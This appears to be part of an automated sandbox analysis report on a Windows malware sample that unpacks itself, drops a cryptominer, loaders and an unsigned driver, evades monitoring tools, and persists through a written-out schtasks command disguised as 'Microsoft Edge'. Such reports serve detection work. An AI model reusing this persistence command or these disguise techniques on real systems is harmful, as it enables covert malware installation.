Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\services64.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\services64.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\services64.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\services64.exe	Section loaded: version.dll
Source: C:\Windows\System32\services64.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\services64.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\services64.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\services64.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\services64.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\services64.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\services64.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\services64.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\services64.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\services64.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\services64.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\services64.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\services64.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\services64.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\services64.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\services64.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\services64.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\services64.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: file.exe

Static file information: File size 1862656 > 1048576

Source: file.exe

Static PE information: Raw size of nataabbx is bigger than: 0x100000 < 0x195200

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 1.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nataabbx:EW;ijueevze:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: miner2.0.exe.82.dr	Static PE information: real checksum: 0x0 should be: 0x18d41
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1c94ce should be: 0x1ceea0
Source: svchost64.exe.85.dr	Static PE information: real checksum: 0x0 should be: 0x9e48
Source: services64.exe.107.dr	Static PE information: real checksum: 0x0 should be: 0x18d41
Source: file.exe	Static PE information: real checksum: 0x1c94ce should be: 0x1ceea0
Source: sihost64.exe.139.dr	Static PE information: real checksum: 0x0 should be: 0xcc5b

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: nataabbx
Source: file.exe	Static PE information: section name: ijueevze
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: nataabbx
Source: axplong.exe.0.dr	Static PE information: section name: ijueevze
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: .xdata
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /4
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /19
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /31
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /45
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /57
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /70
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /81
Source: loader_5879465914[1].exe.6.dr	Static PE information: section name: /92
Source: loader_5879465914.exe.6.dr	Static PE information: section name: .xdata
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /4
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /19
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /31
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /45
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /57
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /70
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /81
Source: loader_5879465914.exe.6.dr	Static PE information: section name: /92
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: .xdata
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /4
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /19
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /31
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /45
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /57
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /70
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /81
Source: Microsoft-Edge.exe.7.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00C3D84C push ecx; ret	6_2_00C3D85F
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Code function: 85_2_00007FFD9BAC00BD pushad ; iretd	85_2_00007FFD9BAC00C1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 107_2_00007FFD9BAC01BD push E95E5098h; ret	107_2_00007FFD9BAC0259
Source: C:\Windows\System32\services64.exe	Code function: 114_2_00007FFD9BAD00BD pushad ; iretd	114_2_00007FFD9BAD00C1
Source: C:\Windows\System32\services64.exe	Code function: 122_2_00007FFD9BAA00BD pushad ; iretd	122_2_00007FFD9BAA00C1
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 139_2_00007FFD9BAA01BD push E95E5298h; ret	139_2_00007FFD9BAA0259
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 144_2_00007FFD9BAC01BD push E95E5098h; ret	144_2_00007FFD9BAC0259
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Code function: 149_2_00007FFD9BA901BD push E95E5398h; ret	149_2_00007FFD9BA90259
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Code function: 159_2_00007FFD9BAD01BD push E95E4F98h; ret	159_2_00007FFD9BAD0259

Source: file.exe	Static PE information: section name: entropy: 7.9826212288436125
Source: file.exe	Static PE information: section name: nataabbx entropy: 7.954246533814316
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.9826212288436125
Source: axplong.exe.0.dr	Static PE information: section name: nataabbx entropy: 7.954246533814316
Source: miner2.0.exe.82.dr	Static PE information: section name: .text entropy: 7.899470281638457
Source: svchost64.exe.85.dr	Static PE information: section name: .text entropy: 7.409218062568192
Source: services64.exe.107.dr	Static PE information: section name: .text entropy: 7.899470281638457

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Executable created and started: C:\Windows\system32\services64.exe
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Executable created and started: C:\Windows\system32\Microsoft\Libs\sihost64.exe

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe

File created: C:\Windows\system32\Microsoft\Libs\WR64.sys

Drops PE files

Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	File created: C:\Users\user\AppData\Local\Temp\svchost64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\services64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	File created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	File created: C:\Windows\System32\services64.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cscript.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f

Creates job files (autostart)

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
